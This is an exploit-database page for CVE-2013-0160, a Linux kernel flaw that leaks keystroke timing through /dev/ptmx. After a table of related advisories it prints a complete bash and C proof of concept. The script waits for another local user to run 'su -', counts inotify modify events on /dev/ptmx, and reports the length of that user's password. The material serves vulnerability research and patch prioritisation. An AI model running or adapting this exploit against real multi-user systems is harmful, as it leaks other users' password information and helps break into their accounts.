Vulners
Lucene search
Linux Kernel 2.6.32-5 (Debian 6.0.5) - '/dev/ptmx' Key Stroke Timing Local Disclosure
| Reporter | Title | Published | Views | Family All 126 |
|---|---|---|---|---|
 | Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure | 5 Feb 201300:00 | – | zdt |
 | CVE-2013-0160 | 18 Feb 201304:41 | – | attackerkb |
 | CVE-2013-0160 | 18 Feb 201302:00 | – | cve |
 | CVE-2013-0160 | 18 Feb 201302:00 | – | cvelist |
 | [SECURITY] [DSA 2669-1] linux security update | 16 May 201302:48 | – | debian |
 | CVE-2013-0160 | 18 Feb 201302:00 | – | debiancve |
 | Debian DSA-2669-1 : linux - privilege escalation/denial of service/information leak | 17 May 201300:00 | – | nessus |
| openSUSE Security Update : kernel (openSUSE-SU-2013:0395-1) | 13 Jun 201400:00 | – | nessus |
| openSUSE Security Update : kernel (openSUSE-SU-2013:0396-1) | 13 Jun 201400:00 | – | nessus |
| SuSE 11.2 Security Update : Linux kernel (SAT Patch Numbers 7667 / 7669 / 7675) | 8 May 201300:00 | – | nessus |
10
#!/bin/bash
# ptmx-su-pwdlen.sh -- This PoC determine the password length of a local
# user who runs "su -". Done thanks to the ptmx keystroke timing attack
# (CVE-2013-0160). See http://vladz.devzero.fr/013_ptmx-timing.php for
# more information.
#
# Tested on Debian 6.0.5 (kernel 2.6.32-5-amd64).
#
# "THE BEER-WARE LICENSE" (Revision 42):
# <[email protected]> wrote this file. As long as you retain this notice
# you can do whatever you want with this stuff. If we meet some day, and
# you think this stuff is worth it, you can buy me a beer in return. -V.
if ps -e -o cmd= | egrep -q "^(-|^)su"; then
echo "[-] Kill/close all running \"su\" session before using this PoC"
exit 1
fi
exe=$(mktemp) || exit 1
tmp=$(mktemp) || exit 1
cat > ${exe}.c << _EOF_
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <sys/inotify.h>
static int count = 0;
void display_result() {
printf("[+] password len is %d\n", count-1);
_exit(0);
}
int main() {
int fd;
char buf[1024];
signal(SIGINT, display_result);
fd = inotify_init();
inotify_add_watch(fd, "/dev/ptmx", IN_MODIFY);
while(read(fd, buf, 1024)) count++;
return 0;
}
_EOF_
cc -o ${exe}{,.c}
echo "[*] Wait for someone to run \"su -\""
while true; do
ps -e -o cmd= | egrep "^(-|^)su" >${tmp}
x=$(wc -l ${tmp})
case ${x% *} in
1) (( run )) && continue;
echo -n "[+] su detected, full command: "
cat ${tmp}; ${exe} &
(( run = 1 )) ;;
2) [ ! -z "$!" ] && kill -2 $!; break ;;
esac
done
rm -f ${exe}{,.c} ${tmp}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Feb 2013 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 22.1
EPSS0.00267